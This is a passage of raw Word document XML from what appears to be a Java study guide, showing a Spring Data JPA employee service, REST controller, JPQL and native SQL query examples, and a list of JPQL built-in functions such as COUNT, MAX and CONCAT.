          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ABE3A99"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rvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDAF346"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ublic class EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B3894A" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A6B2F4"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202BF0AB"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EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BC822C" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6ADAB8B5"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Method to retrieve employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECF914"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ublic List&lt;Employee&gt; getEmployeesByDepartment(String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151C61E3"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return employeeRepository.findByDepartment(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE41156"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A0235"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B38FBB"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Method to retrieve all employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9DE906"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ublic List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B018131"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return employeeRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C611F0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AAF590" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="599B52D4"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Method to retrieve a specific employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C56DBA"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ublic Employee getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0F42D3"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return employeeRepository.findById(id).orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178372B8"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D4BD0F"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0465B57B" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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4. Calling the Service in a Controller (Optional, if using Spring MVC):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFD8AB"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You can expose the service to a controller for a RESTful API or other purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857FFAC"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mport org.springframework.beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F8445F"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mport org.springframework.web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1963D704" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263C7A83"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mport java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7934C70F" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78C5719F"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RestController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A4E59C"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RequestMapping("/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56096D75"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ublic class EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B90EE6" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507D6EE3"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7713D26D"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EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7CA93E" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F757CED"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Endpoint to get all employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79465BEC"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GetMapping("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B41660C"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ublic List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F490D5"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return employeeService.getAllEmployees();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65173D"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44397386" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B11B8E3"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Endpoint to get employees by department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EEDB2C"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GetMapping("/department/{department}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635AE074"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ublic List&lt;Employee&gt; getEmployeesByDepartment(@PathVariable String department) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061A832"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return employeeService.getEmployeesByDepartment(department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7E48C7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BAC020" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7769708D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    // Endpoint to get an employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230FC4C4"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GetMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFC4A47"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ublic Employee getEmployeeById(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBA4CAD"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return employeeService.getEmployeeById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491C5C3E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600B96BB"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A26677" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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5. Using JPQL for Custom Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C41B799"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If you need to perform more complex queries, you can use </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Java Persistence Query Language) in the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D56A7"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For example, to retrieve employees with a salary greater than a specific value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56621810"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mport org.springframework.data.jpa.repository.Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C41FE06" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABAE859"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ublic interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7072B3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED2B19"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Query("SELECT e FROM Employee e WHERE e.salary &gt; :salary")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509B3167"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ist&lt;Employee&gt; findEmployeesWithSalaryGreaterThan(@Param("salary") double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC315A8"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322B4B0" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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6. Using Native SQL Queries (Optional):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A71B8"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n case you need to use a native SQL query, you can annotate your repository method with @Query and set nativeQuery = true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35697902"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mport org.springframework.data.jpa.repository.Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A542169" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78929142"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ublic interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DB8232" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="651E7D52"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Query(value = "SELECT * FROM employee WHERE salary &gt; ?1", nativeQuery = true)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAA5BA"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ist&lt;Employee&gt; findEmployeesWithSalaryGreaterThan(double salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74C2D6"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066365A9" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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7. Call the Repository Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3FB6AC"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Now, you can call these methods from your service to fetch the employee data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4FB9C0"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xample in Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5695EFB6"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ublic List&lt;Employee&gt; getEmployeesWithHighSalary(double salary) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511A07B6"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return employeeRepository.findEmployeesWithSalaryGreaterThan(salary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA6AEDA"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EC3F4" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F002AB3" w14:textId="77777777" w:rsidR="00330992" w:rsidRPr="007F3379" w:rsidRDefault="00330992"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By following the above steps, you can easily retrieve employee details using JPA. You can either use the built-in JpaRepository methods (like findById, findAll, etc.) or create custom queries using JPQL or native SQL queries to meet your specific requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467C7835" w14:textId="0053C0CA" w:rsidR="00C97E60" w:rsidRPr="00CE4B95"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A9AD114">
          <v:rect id="_x0000_i2460" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C42859" w14:textId="34A3709D" w:rsidR="00E74B00" w:rsidRPr="00CE4B95" w:rsidRDefault="002A0B1E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="556" w:name="_Toc196308036"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain a built-in function in JPA</w:t>
      </w:r>
      <w:r w:rsidR="00E74B00" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="556"/>
    </w:p>
    <w:p w14:paraId="104BD79B" w14:textId="08D95430" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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In </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA (Java Persistence API)</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, there are several built-in functions that you can use to enhance your queries, particularly when using JPQL (Java Persistence Query Language). These functions help you perform operations directly in the query itself without needing to handle them programmatically. Below are some examples of commonly used </w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>built-in functions</w:t>
      </w:r>
      <w:r w:rsidRPr="007F3379">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B087C" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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1. COUNT() – Count the number of results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA15935"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he COUNT() function is used to count the number of records or entities that match a given criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE83022"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SELECT COUNT(e) FROM Employee e WHERE e.department = :department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B2EC9"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ong countEmployeesByDepartment(@Param("department") String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EDC32" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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2. MAX() – Get the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2115A"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he MAX() function retrieves the maximum value of a field, typically a numeric or date field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D808377"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SELECT MAX(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16402794"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Double findMaxSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B06D9" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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3. MIN() – Get the minimum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11828183"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he MIN() function retrieves the minimum value of a field, such as the minimum salary or date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AF276D"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SELECT MIN(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18885A37"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Double findMinSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F9ACBF" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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lastRenderedPageBreak/>
        <w:t>4. AVG() – Get the average value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22650124"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he AVG() function calculates the average value of a numeric field (e.g., average salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E98F2F"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SELECT AVG(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626AE06"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Double findAverageSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF25F9" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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5. SUM() – Get the sum of a numeric field</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25909CCC"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he SUM() function adds up the values of a numeric field (e.g., total salary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DC01B2"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SELECT SUM(e.salary) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E39DD5D"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Double findTotalSalary();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEDE823" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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6. CONCAT() – Concatenate strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF7F20"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he CONCAT() function is used to concatenate two or more string fields together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECC47E"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SELECT CONCAT(e.firstName, ' ', e.lastName) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313AF5C2"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ist&lt;String&gt; findFullNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF2E11A" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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7. SUBSTRING() – Extract part of a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B2832E"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he SUBSTRING() function is used to extract a substring from a string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F424B"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SELECT SUBSTRING(e.name, 1, 3) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217F1522"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ist&lt;String&gt; findFirstThreeCharactersOfNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A83AF" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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8. LENGTH() – Get the length of a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627A8B3E"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he LENGTH() function returns the length of a string field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123CABFB"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SELECT LENGTH(e.name) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9E8996"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ist&lt;Integer&gt; findNameLengths();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29110B52" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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9. TRIM() – Trim whitespace from a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC1BBD"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he TRIM() function is used to remove leading and trailing spaces from a string field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0D80F"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SELECT TRIM(e.name) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D8C57"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ist&lt;String&gt; findTrimmedNames();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1DDE16" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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10. COALESCE() – Return the first non-null value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDF531"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he COALESCE() function returns the first non-null value from a list of arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101434BE"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SELECT COALESCE(e.middleName, 'No Middle Name') FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72380BA0"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ist&lt;String&gt; findMiddleNameOrDefault();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22F893" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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11. NULLIF() – Return null if two expressions are equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A71E8E"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he NULLIF() function returns NULL if the two expressions are equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214C10DE"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SELECT NULLIF(e.salary, 0) FROM Employee e")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2FE1F9"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ist&lt;Double&gt; findNonZeroSalaries();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFCF8AF" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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12. CURRENT_DATE() – Get the current date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDD025A"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he CURRENT_DATE() function returns the current date, typically used for date comparisons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B01A0E"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SELECT e FROM Employee e WHERE e.startDate = CURRENT_DATE")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE43904"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ist&lt;Employee&gt; findEmployeesWithTodayStartDate();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016C358F" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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13. CURRENT_TIME() – Get the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F6007"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he CURRENT_TIME() function returns the current time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1323C56A"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SELECT e FROM Employee e WHERE e.lastUpdatedTime &lt; CURRENT_TIME")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E591C74"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ist&lt;Employee&gt; findEmployeesLastUpdatedBeforeCurrentTime();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA58564" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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14. CURRENT_TIMESTAMP() – Get the current date and time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FB170F"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he CURRENT_TIMESTAMP() function retrieves the current timestamp (both date and time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B06A19"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SELECT e FROM Employee e WHERE e.lastUpdated &lt; CURRENT_TIMESTAMP")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E31E25"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ist&lt;Employee&gt; findEmployeesUpdatedBeforeCurrentTimestamp();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C083BD9" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00000000" w:rsidP="007F337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3F104A4">
          <v:rect id="_x0000_i2461" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ECB578" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E"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Example of Using Built-in Functions in JPA with Spring Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA9AED"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mport org.springframework.data.jpa.repository.Query;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72166A3C"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mport org.springframework.data.repository.CrudRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F66E77" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68F8B002"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ublic interface EmployeeRepository extends CrudRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27852255" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3982D60B"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Query("SELECT COUNT(e) FROM Employee e WHERE e.department = :department")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A428E"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ong countEmployeesByDepartment(String department);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B82445" w14:textId="77777777" w:rsidR="00C2152E" w:rsidRPr="007F3379" w:rsidRDefault="00C2152E" w:rsidP="007F3379">
      <w:pPr>
        <w:jc w:val="both"/>
